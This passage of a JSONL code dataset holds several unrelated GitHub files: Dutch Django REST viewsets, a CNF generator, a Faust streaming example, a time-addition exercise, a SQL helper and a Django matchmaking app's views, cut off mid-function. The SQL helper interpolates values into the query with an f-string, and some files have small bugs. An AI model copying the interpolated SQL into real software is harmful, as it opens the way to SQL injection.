Om deze reden\n zijn ook alle attributen optioneel.\n\n Indien de KLANT geverifieerd is mag een relatie gelegd worden met een\n NATUURLIJK PERSOON of VESTIGING middels het attribuut `subject` of, indien\n er geen API beschikbaar is voor deze objecten, middels\n `subjectIdentificatie`.\n\n create:\n Maak een KLANT aan.\n\n Maak een KLANT aan.\n\n list:\n Alle KLANTen opvragen.\n\n Alle KLANTen opvragen.\n\n retrieve:\n Een specifiek KLANT opvragen.\n\n Een specifiek KLANT opvragen.\n\n update:\n Werk een KLANT in zijn geheel bij.\n\n Werk een KLANT in zijn geheel bij.\n\n partial_update:\n Werk een KLANT deels bij.\n\n Werk een KLANT deels bij.\n\n destroy:\n Verwijder een KLANT.\n\n Verwijder een KLANT.\n \"\"\"\n\n queryset = Klant.objects.all()\n serializer_class = KlantSerializer\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n\nclass ContactMomentViewSet(viewsets.ModelViewSet):\n \"\"\"\n Opvragen en bewerken van CONTACTMOMENTen.\n\n create:\n Maak een CONTACTMOMENT aan.\n\n Maak een CONTACTMOMENT aan.\n\n list:\n Alle CONTACTMOMENTen opvragen.\n\n Alle CONTACTMOMENTen opvragen.\n\n retrieve:\n Een specifiek CONTACTMOMENT opvragen.\n\n Een specifiek CONTACTMOMENT opvragen.\n\n update:\n Werk een CONTACTMOMENT in zijn geheel bij.\n\n Werk een CONTACTMOMENT in zijn geheel bij.\n\n partial_update:\n Werk een CONTACTMOMENT deels bij.\n\n Werk een CONTACTMOMENT deels bij.\n\n destroy:\n Verwijder een CONTACTMOMENT.\n\n Verwijder een CONTACTMOMENT.\n \"\"\"\n\n queryset = ContactMoment.objects.all()\n serializer_class = ContactMomentSerializer\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n\nclass VerzoekViewSet(viewsets.ModelViewSet):\n \"\"\"\n Opvragen en bewerken van VERZOEKen.\n\n create:\n Maak een VERZOEK aan.\n\n Maak een VERZOEK aan.\n\n list:\n Alle VERZOEKen opvragen.\n\n Alle VERZOEKen opvragen.\n\n retrieve:\n Een specifiek VERZOEK opvragen.\n\n Een specifiek VERZOEK opvragen.\n\n update:\n Werk een VERZOEK in zijn geheel bij.\n\n Werk een VERZOEK in zijn geheel bij.\n\n partial_update:\n Werk een VERZOEK deels bij.\n\n Werk een VERZOEK deels bij.\n\n destroy:\n Verwijder een VERZOEK.\n\n Verwijder een VERZOEK.\n \"\"\"\n\n queryset = Verzoek.objects.all()\n serializer_class = VerzoekSerializer\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n\nclass ObjectContactMomentViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en verwijderen van OBJECT-CONTACTMOMENT relaties.\n\n Het betreft een relatie tussen een willekeurig OBJECT, bijvoorbeeld een\n ZAAK in de Zaken API, en een CONTACTMOMENT.\n\n create:\n Maak een OBJECT-CONTACTMOMENT relatie aan.\n\n Maak een OBJECT-CONTACTMOMENT relatie aan.\n\n **LET OP: Dit endpoint hoor je als consumer niet zelf aan te spreken.**\n\n Andere API's, zoals de Zaken API, gebruiken dit\n endpoint bij het synchroniseren van relaties.\n\n list:\n Alle OBJECT-CONTACTMOMENT relaties opvragen.\n\n Alle OBJECT-CONTACTMOMENT relaties opvragen.\n\n retrieve:\n Een specifiek OBJECT-CONTACTMOMENT relatie opvragen.\n\n Een specifiek OBJECT-CONTACTMOMENT relatie opvragen.\n\n destroy:\n Verwijder een OBJECT-CONTACTMOMENT relatie.\n\n Verwijder een OBJECT-CONTACTMOMENT relatie.\n\n **LET OP: Dit endpoint hoor je als consumer niet zelf aan te spreken.**\n\n Andere API's, zoals de Zaken API, gebruiken dit\n endpoint bij het synchroniseren van relaties.\n \"\"\"\n\n queryset = ObjectContactMoment.objects.all()\n serializer_class = ObjectContactMomentSerializer\n filterset_class = ObjectContactMomentFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n def perform_destroy(self, instance):\n # destroy is only allowed if the remote relation does no longer exist, so check for that\n validator = ObjectContactMomentDestroyValidator()\n\n try:\n validator(instance)\n except ValidationError as exc:\n raise ValidationError(\n {api_settings.NON_FIELD_ERRORS_KEY: exc}, code=exc.detail[0].code\n )\n else:\n super().perform_destroy(instance)\n\n\nclass ObjectVerzoekViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en verwijderen van OBJECT-VERZOEK relaties.\n\n Het betreft een relatie tussen een willekeurig OBJECT, bijvoorbeeld een\n ZAAK in de Zaken API, en een VERZOEK.\n\n create:\n Maak een OBJECT-VERZOEK relatie aan.\n\n Maak een OBJECT-VERZOEK relatie aan.\n\n **LET OP: Dit endpoint hoor je als consumer niet zelf aan te spreken.**\n\n Andere API's, zoals de Zaken API, gebruiken dit\n endpoint bij het synchroniseren van relaties.\n\n list:\n Alle OBJECT-VERZOEK relaties opvragen.\n\n Alle OBJECT-VERZOEK relaties opvragen.\n\n retrieve:\n Een specifiek OBJECT-VERZOEK relatie opvragen.\n\n Een specifiek OBJECT-VERZOEK relatie opvragen.\n\n destroy:\n Verwijder een OBJECT-VERZOEK relatie.\n\n Verwijder een OBJECT-VERZOEK relatie.\n\n **LET OP: Dit endpoint hoor je als consumer niet zelf aan te spreken.**\n\n Andere API's, zoals de Zaken API, gebruiken dit\n endpoint bij het synchroniseren van relaties.\n \"\"\"\n\n queryset = ObjectVerzoek.objects.all()\n serializer_class = ObjectVerzoekSerializer\n filterset_class = ObjectVerzoekFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n def perform_destroy(self, instance):\n # destroy is only allowed if the remote relation does no longer exist, so check for that\n validator = ObjectVerzoekDestroyValidator()\n\n try:\n validator(instance)\n except ValidationError as exc:\n raise ValidationError(\n {api_settings.NON_FIELD_ERRORS_KEY: exc}, code=exc.detail[0].code\n )\n else:\n super().perform_destroy(instance)\n\n\nclass VerzoekInformatieObjectViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en bewerken van VERZOEK-INFORMATIEOBJECT relaties.\n\n create:\n Maak een VERZOEK-INFORMATIEOBJECT relatie aan.\n\n Registreer een INFORMATIEOBJECT bij een VERZOEK. Er worden twee types van\n relaties met andere objecten gerealiseerd:\n\n **Er wordt gevalideerd op**\n - geldigheid `verzoek` URL\n - geldigheid `informatieobject` URL\n - de combinatie `informatieobject` en `verzoek` moet uniek zijn\n\n **Opmerkingen**\n - Bij het aanmaken wordt ook in de Documenten API de gespiegelde relatie\n aangemaakt, echter zonder de relatie-informatie.\n\n list:\n Alle VERZOEK-INFORMATIEOBJECT relaties opvragen.\n\n Deze lijst kan gefilterd wordt met query-string parameters.\n\n retrieve:\n Een specifieke VERZOEK-INFORMATIEOBJECT relatie opvragen.\n\n Een specifieke VERZOEK-INFORMATIEOBJECT relatie opvragen.\n\n update:\n Werk een VERZOEK-INFORMATIEOBJECT relatie in zijn geheel bij.\n\n Je mag enkel de gegevens van de relatie bewerken, en niet de relatie zelf\n aanpassen.\n\n **Er wordt gevalideerd op**\n - `informatieobject` URL en `verzoek` URL mogen niet veranderen\n\n partial_update:\n Werk een VERZOEK-INFORMATIEOBJECT relatie deels bij.\n\n Je mag enkel de gegevens van de relatie bewerken, en niet de relatie zelf\n aanpassen.\n\n **Er wordt gevalideerd op**\n - `informatieobject` URL en `verzoek` URL mogen niet veranderen\n\n destroy:\n Verwijder een VERZOEK-INFORMATIEOBJECT relatie.\n\n Verwijder een VERZOEK-INFORMATIEOBJECT relatie.\n \"\"\"\n\n queryset = VerzoekInformatieObject.objects.all()\n serializer_class = VerzoekInformatieObjectSerializer\n filterset_class = VerzoekInformatieObjectFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n }\n\n def get_queryset(self):\n qs = super().get_queryset()\n\n # Do not display BesluitInformatieObjecten that are marked to be deleted\n cache = caches[\"drc_sync\"]\n\n # TODO: Store cachekeys somewhere central.\n marked_vios = cache.get(\"vios_marked_for_delete\")\n if marked_vios:\n return qs.exclude(uuid__in=marked_vios)\n return qs\n\n\nclass VerzoekContactMomentViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en bewerken van VERZOEK-CONTACTMOMENT relaties.\n\n create:\n Maak een VERZOEK-CONTACTMOMENT relatie aan.\n\n Registreer een CONTACTMOMENT bij een VERZOEK. Er worden twee types van\n relaties met andere objecten gerealiseerd:\n\n **Er wordt gevalideerd op**\n - geldigheid `verzoek` URL\n - geldigheid `contactmoment` URL\n - de combinatie `contactmoment` en `verzoek` moet uniek zijn\n\n list:\n Alle VERZOEK-CONTACTMOMENT relaties opvragen.\n\n Deze lijst kan gefilterd wordt met query-string parameters.\n\n retrieve:\n Een specifieke VERZOEK-CONTACTMOMENT relatie opvragen.\n\n Een specifieke VERZOEK-CONTACTMOMENT relatie opvragen.\n\n update:\n Werk een VERZOEK-CONTACTMOMENT relatie in zijn geheel bij.\n\n Je mag enkel de gegevens van de relatie bewerken, en niet de relatie zelf\n aanpassen.\n\n **Er wordt gevalideerd op**\n - `contactmoment` URL en `verzoek` URL mogen niet veranderen\n\n partial_update:\n Werk een VERZOEK-CONTACTMOMENT relatie deels bij.\n\n Je mag enkel de gegevens van de relatie bewerken, en niet de relatie zelf\n aanpassen.\n\n **Er wordt gevalideerd op**\n - `contactmoment` URL en `verzoek` URL mogen niet veranderen\n\n destroy:\n Verwijder een VERZOEK-CONTACTMOMENT relatie.\n\n Verwijder een VERZOEK-CONTACTMOMENT relatie.\n \"\"\"\n\n queryset = VerzoekContactMoment.objects.all()\n serializer_class = VerzoekContactMomentSerializer\n filterset_class = VerzoekContactMomentFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n }\n\n\nclass VerzoekProductViewSet(\n CheckQueryParamsMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n viewsets.ReadOnlyModelViewSet,\n):\n \"\"\"\n Opvragen en bewerken van VERZOEK-PRODUCT relaties.\n\n create:\n Maak een VERZOEK-PRODUCT relatie aan.\n\n Registreer een PRODUCT bij een VERZOEK. Er worden twee types van\n relaties met andere objecten gerealiseerd:\n\n **Er wordt gevalideerd op**\n - geldigheid `verzoek` URL\n - geldigheid `product` URL\n\n list:\n Alle VERZOEK-PRODUCT relaties opvragen.\n\n Deze lijst kan gefilterd wordt met query-string parameters.\n\n retrieve:\n Een specifieke VERZOEK-PRODUCT relatie opvragen.\n\n Een specifieke VERZOEK-PRODUCT relatie opvragen.\n\n destroy:\n Verwijder een VERZOEK-PRODUCT relatie.\n\n Verwijder een VERZOEK-PRODUCT relatie.\n \"\"\"\n\n queryset = VerzoekProduct.objects.all()\n serializer_class = VerzoekProductSerializer\n filterset_class = VerzoekProductFilter\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n }\n","repo_name":"VNG-Realisatie/klantinteracties-api","sub_path":"src/kic/api/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":14999,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15092192992","text":"#!/usr/bin/env python\n\n\"\"\"StatsApp\"\"\"\n\nimport argparse\n\nfrom . import parser as chat_parser\n\ndef main():\n \"\"\"Main\"\"\"\n parser = argparse.ArgumentParser(prog='StatsApp')\n parser.add_argument('chat', help='Chat file')\n args = parser.parse_args()\n chat_file = args.chat\n\n # Load pandas dataframe\n df = chat_parser.load_file(chat_file)\n # print(df)\n chat_parser.plot_messages(df)\n\nif __name__=='__main__':\n sys.exit(main(sys.argv))\n","repo_name":"llaaperi/StatsApp","sub_path":"statsapp/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"551430264","text":"import numpy as np\n\nK = 3\n\n\n\ndef CreateRandomCNF(N, L, filename):\n f = open(filename, 'w')\n f.write('c The CNF file\\n')\n f.write('p cnf ' + str(int(N)) + ' ' + str(int(L)) + '\\n')\n Prop = np.array(range(N))\n\n for i in range(L):\n np.random.shuffle(Prop)\n for j in range(K):\n sign = np.random.random(1)\n if sign > 0.5:\n f.write(str(Prop[j] + 1) + ' ')\n else:\n f.write('-' + str(Prop[j] + 1) + ' ')\n f.write('0\\n')\n\n f.close()\n\n\nfor i in range(16):\n l = int(300 + 20 * i)\n print(l)\n for j in range(100):\n CreateRandomCNF(N=100, L=l, filename='CNFs/N=100/L=' + str(l) + '/' + str(j+1) + '.cnf')\n\nfor i in range(16):\n l = int(450 + 30 * i)\n print(l)\n for j in range(100):\n CreateRandomCNF(N=150, L=l, filename='CNFs/N=150/L=' + str(l) + '/' + str(j+1) + '.cnf')\n","repo_name":"lanhongjianlr/CS8803-LCS-Project-1","sub_path":"CreateRandomCNF.py","file_name":"CreateRandomCNF.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40448662852","text":"import logging\nfrom random import randint\nimport time\nfrom functools import partial\nfrom typing import AsyncIterator\n\nimport faust\nfrom faust import ChannelT, StreamT\n\napp = faust.App(\"bound_agent\")\nlogger = logging.getLogger(__name__)\n\nclass DeviceAction(faust.Record):\n device_id: str\n\nclass DeadLetter(faust.Record):\n stage: str\n record: DeviceAction\n\nasync def stage1_agent(\n dead_letters: ChannelT,\n stream: StreamT[DeviceAction]\n) -> AsyncIterator[DeviceAction]:\n async for action in stream:\n now_ts = int(time.time())\n try:\n if now_ts % 3 == 0:\n raise Exception(\"!!!\")\n \n logger.info(f\"[stage1] action arrived: {action}\")\n yield action\n except:\n await dead_letters.send(value=DeadLetter(stage=\"stage1\", record=action))\n\nasync def stage2_agent(\n dead_letters: ChannelT,\n stream: StreamT[DeviceAction]\n) -> AsyncIterator[DeviceAction]:\n async for action in stream:\n now_ts = int(time.time())\n try:\n if now_ts % 3 == 1:\n raise Exception(\"!!!\")\n\n logger.info(f\"[stage2] action arrived: {action}\")\n yield action\n except:\n await dead_letters.send(value=DeadLetter(stage=\"stage2\", record=action))\n\nasync def deadletter_agent(stream: StreamT[DeviceAction]) -> AsyncIterator[DeviceAction]:\n async for dl in stream:\n logger.error(f\"[dead letter] arrived: {dl}\")\n yield dl\n\nasync def action_generator(device_actions: ChannelT):\n for i in range(0, randint(3, 101)):\n await device_actions.send(value=DeviceAction(device_id=i))\n \n\ndef main():\n channel_device_action = app.channel(value_type=DeviceAction)\n channel_stage1_stage2 = app.channel(value_type=DeviceAction)\n channel_deadletter = app.channel(value_type=DeadLetter)\n\n app.timer(interval=3, on_leader=True)(partial(action_generator, channel_device_action))\n app.agent(channel_deadletter, name=\"dead-letter-agent\")(deadletter_agent)\n\n app.agent(channel_device_action, name=\"stage1-agent\", sink=[channel_stage1_stage2])(\n partial(stage1_agent, channel_deadletter)\n )\n app.agent(channel_stage1_stage2, name=\"stage2-agent\")(\n partial(stage2_agent, channel_deadletter)\n )\n\n app.main()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"faust-streaming/faust","sub_path":"examples/bound_agent.py","file_name":"bound_agent.py","file_ext":"py","file_size_in_byte":2346,"program_lang":"python","lang":"en","doc_type":"code","stars":1280,"dataset":"github-code","pt":"69"}
+{"seq_id":"21942649260","text":"# Write a function named add_time that takes in two required parameters and one optional parameter:\nfrom typing import Union, Any\n\n\n# a start time in the 12-hour clock format (ending in AM or PM)\n# a duration time that indicates the number of hours and minutes\n# (optional) a starting day of the week, case insensitive\n# The function should add the duration time to the start time and return the result.\n\n# If the result will be the next day, it should show (next day) after the time. \n# If the result will be more than one day later, it should show (n days later) after the time,\n# where \"n\" is the number of days later.\n\n# If the function is given the optional starting day of the week parameter, then the output \n# should display the day of the week of the result. The day of the week in the output should\n# appear after the time and before the number of days later.\n\n# Below are some examples of different cases the function should handle. Pay close attention \n# to the spacing and punctuation of the results.\n# /////////////////////////////////////////////////////////////////////////////////\ndef add_time(start_time, duration, day=None):\n new_time = \"\"\n # split the time string i.e \"02:30 AM\"\n startTime = start_time\n startTime = startTime.split(\" \") # this will split the string where it encounters a white space\n startTimeMeridian = startTime[1] # assigning the meridian time AMPM\n startTimeFirstElement = startTime[0]\n startTime = startTimeFirstElement.split(\":\")\n startTimeHour = int(startTime[0])\n startTimeMinutes = int(startTime[1])\n\n # converting start time to 24 hours format\n if startTimeMeridian == \"PM\":\n startTimeHour = startTimeHour + 12\n\n # splitting Duration string\n duration = duration\n duration = duration.split(\":\")\n durationHour = int(duration[0])\n durationMinutes = int(duration[1])\n\n # converting startTime to minutes\n # converting hours to minutes\n startTimeInMinutes = int(startTimeMinutes) + (startTimeHour * 60)\n\n # converting duration to minutes\n durationInMinutes = durationMinutes + (durationHour * 60)\n\n totalMinutes = int(startTimeInMinutes) + int(durationInMinutes)\n\n # calculating the total hours\n hours = int(totalMinutes) / 60\n # calculating the total minutes\n minutes = int(totalMinutes) % 60\n\n # concatenating zero to the minutes if minutes is less than 10\n if len(str(minutes)) < 2:\n new_time = \"0\" + str(minutes)\n else:\n new_time = minutes\n\n # calculating days\n # there are 24 hours per day the total number of hours divided by 24 gives us the total number of days\n days = int(hours / 24)\n # the modulus gives us the number of hours left\n # this basically converts the hours to a 24-hour time format\n # answer will always be less than 24\n hour = hours % 24\n\n # getting the final time in 12-hour format and meridian\n # this converts the 24-hour time format to a 12-hour format\n # the answer will never be greater than 12\n finalHours = int(hour % 12)\n # if hour is 0 then\n # hour will be zero if is less than an hour i.e 00:20 AM, 00:5 = 25min\n # so hours = 26 / 60 = 0 hours\n # now hour = 0 % 24 = 0\n if int(hour / 12) == 0: # hour is in 24-hour time format so if hour is less than 12 it means the meridian is \"AM\"\n # so when hour is divided by 12 it will return 0 because the numerator (hour) is less than the denominator (12)\n finalMeridian = \"AM\"\n if finalHours == 0: # # this is to distinguish between 12 AM and 12 PM\n finalHours = 12\n else: # if hour is greater than 12 (hour / 12) will return a number greater than 0 meaning it's \"PM\"\n finalMeridian = \"PM\"\n if finalHours == 0: # this is to distinguish between 12 AM and 12 PM\n finalHours = 12\n\n new_time = str(finalHours) + \":\" + str(new_time) + \" \" + finalMeridian\n if day is not None:\n dayz = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\n # initializing pos variable\n pos = 0\n while True:\n # will break when given day matches any element in the dayz list\n if day.lower() == dayz[pos].lower():\n break\n # pos will increment until the if statement executes\n pos = pos + 1\n # ?????\n newDay = dayz[((pos + (days % 7)) % 7)]\n new_time = new_time + \", \" + newDay\n\n # output\n if days == 1:\n new_time = new_time + \"(next day)\"\n if days > 1:\n days = str(days)\n new_time = new_time + \" (\" + days + \" days later)\"\n\n return new_time\n\nprint(add_time(\"11:02 PM\", \"30:01\", \"Monday\"))","repo_name":"mmveliso/freecodecamp_projects","sub_path":"add_time/add_time.py","file_name":"add_time.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"10710027025","text":"def select_properties_query(allowed_statuses):\n \"\"\"\n function to return query based on allowed\n statuses\n \"\"\"\n query = (\n \"SELECT p.address, p.city, p.price, p.description \"\n \"FROM habi_db.status_history as sh \"\n \"JOIN habi_db.property as p on p.id = sh.property_id \"\n \"JOIN habi_db.status as s on s.id = sh.status_id\"\n \" WHERE s.name \"\n f\"IN ({allowed_statuses})\"\n )\n return query\n","repo_name":"Lawlet2/tuhabi_test","sub_path":"queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23870725473","text":"from django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom account.models import Profile, ProfileImage, Account, Preference\nfrom account.forms import ProfileCreationForm\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib.auth.forms import PasswordChangeForm\nimport json\n# Create your views here.\n\n#View for ABout Us page\ndef about_us(request):\n\tcontext = {}\n\tprofile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tcontext = {\n\t\t'profile_image' : profile_image,\n\t}\n\treturn render(request, 'mainApp/about_us.html', context)\n\n#View for Privacy Policy page\ndef privacy_policy(request):\n\tcontext = {}\n\tprofile = Profile.objects.get(user=request.user)\n\tprofile_image = ProfileImage.objects.get(profile=profile)\n\tcontext = {\n\t\t'profile_image' : profile_image,\n\t}\n\treturn render(request, 'mainApp/privacy_policy.html', context)\n\ndef privacy_policy_external(request):\n\treturn render(request, 'mainApp/privacy_policy_external.html', {})\n\ndef home(request):\n\tsystem_messages = messages.get_messages(request)\n\tfor message in system_messages:\n\t\tpass\n\tsystem_messages.used = True\n\tuser = request.user\n\tif request.user.is_superuser:\n\t\treturn redirect('admin/')\n\tif request.user.is_authenticated:\n\t\tif Profile.objects.filter(user=request.user).count():\n\t\t\treturn redirect('feed')\n\t\telse:\n\t\t\treturn redirect('createProfile')\n\telse:\n\t\tif request.POST:\n\t\t\tuserinput = request.POST['email']\n\t\t\temail = ''\n\t\t\tpassword = request.POST['password']\n\t\t\ttry:\n\t\t\t\temail = Account.objects.get(username=userinput).email.lower()\n\t\t\texcept Account.DoesNotExist:\n\t\t\t\temail = request.POST['email'].lower()\n\t\t\tuser = authenticate(email = email, password = password)\n\t\t\tif user:\n\t\t\t\tlogin(request, user)\n\t\t\t\tif Profile.objects.filter(user=request.user).count():\n\t\t\t\t\treturn redirect('feed')\n\t\t\t\telse:\n\t\t\t\t\treturn redirect('createProfile')\n\t\t\telse:\n\t\t\t\tmessages.error(request, 'User does not exist, please register now')\t\t\n\n\treturn render(request, 'mainApp/home.html', {})\n\ndef feed(request):\n\tcontext = {}\n\tprofile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tpreference = Preference.objects.get(profile=profile)\n\texcept Preference.DoesNotExist:\n\t\tpreference = ''\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tif preference:\n\t\tmin_age = preference.age[:2]\n\t\tmax_age = preference.age[3:]\n\t\tmin_height = preference.height[:3]\n\t\tmax_height = preference.height[4:]\n\t\tsalary = preference.salary\n\t\tif salary == '<5 LPA':\n\t\t\tmin_salary = 0\n\t\t\tmax_salary = 5\n\t\telif salary == '5-10 LPA':\n\t\t\tmin_salary = 5\n\t\t\tmax_salary = 1\n\t\telif salary == '10-15 LPA':\n\t\t\tmin_salary = 10\n\t\t\tmax_salary = 15\n\t\telse:\n\t\t\tmin_salary = 15\n\t\t\tmax_salary = 1000000\n\t\teducation = preference.education.split(',')[1:]\n\t\tcomplexion = preference.complexion.split(',')[1:]\n\t\tprint(education, complexion)\n\t\tmarried = preference.married\n\t\tif profile.user.gender == 'M':\n\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\tuser__gender = 'F',\n\t\t\t\tuser__is_active=True,\n\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\teducation__in = education,\n\t\t\t\tcomplexion__in = complexion,\n\t\t\t\tmarital_status = married,\n\t\t\t)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\telse:\n\t\t\tget_profiles = Profile.objects.filter(\n\t\t\t\tuser__gender = 'M', \n\t\t\t\tuser__is_active=True,\n\t\t\t\tuser__age__range = (min_age, max_age),\n\t\t\t\theight__range = (min_height, max_height),\n\t\t\t\tsalary__range = (min_salary, max_salary),\n\t\t\t\teducation__in = education,\n\t\t\t\tcomplexion__in = complexion,\n\t\t\t\tmarital_status = married,\n\t\t\t)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True).order_by('-user__date_joined')[:3]\n\telse:\n\t\tif profile.user.gender == 'M':\n\t\t\tget_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'F', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\telse:\n\t\t\tget_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True)\n\t\t\tlatest_profiles = Profile.objects.filter(user__gender = 'M', user__is_active=True).order_by('-user__date_joined')[:3]\n\t\teducation = ''\n\t\tcomplexion = ''\n\tpage = request.GET.get('page', 1)\n\tpaginator = Paginator(get_profiles, 10)\n\ttry:\n\t\tshow_profiles = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tshow_profiles = paginator.page(1)\n\texcept EmptyPage:\n\t\tshow_profiles = paginator.page(paginator.num_pages)\n\t\n\tcontext = {\n\t\t'profile' : profile,\n\t\t'profile_image' : profile_image,\n\t\t'show_profiles' : show_profiles,\n\t\t'latest_profiles' : latest_profiles,\n\t\t'preference'\t: preference,\n\t\t'education'\t\t: education,\n\t\t'complexion'\t: complexion\n\t}\n\n\tprint(context)\n\treturn render(request, 'mainApp/feed.html', context )\n\ndef sort_by(request, key, value):\n\tcontext = {}\n\tprofile = Profile.objects.get(user=request.user)\n\ttry:\n\t\tpreference = Preference.objects.get(profile=profile)\n\texcept Preference.DoesNotExist:\n\t\tpreference = ''\n\ttry:\n\t\tprofile_image = ProfileImage.objects.get(profile=profile)\n\texcept ProfileImage.DoesNotExist:\n\t\tprofile_image = ''\n\tif preference:\n\t\tmin_age = preference.age[:2]\n\t\tmax_age = preference.age[3:]\n\t\tmin_height = preference.height[:3]\n\t\tmax_height = preference.height[4:]\n\t\tsalary = preference.salary\n\t\tif salary == 'Below 5 LPA':\n\t\t\tmin_salary = 0\n\t\t\tmax_salary = 5\n\t\telif salary == '5-10 LPA':\n\t\t\tmin_salary = 5\n\t\t\tmax_salary = 10\n\t\telif salary == '10-15 LPA':\n\t\t\tmin_salary = 10\n\t\t\tmax_salary = 